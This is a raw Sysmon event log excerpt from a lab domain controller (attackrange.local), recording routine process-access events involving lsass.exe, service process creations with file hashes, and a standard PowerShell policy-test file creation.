09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.342{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.338{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.338{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.342{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.338{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.338{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_lc4ga5ve.epe.ps12021-09-27 09:20:16.322 10341000x80000000000000001052993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.322{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 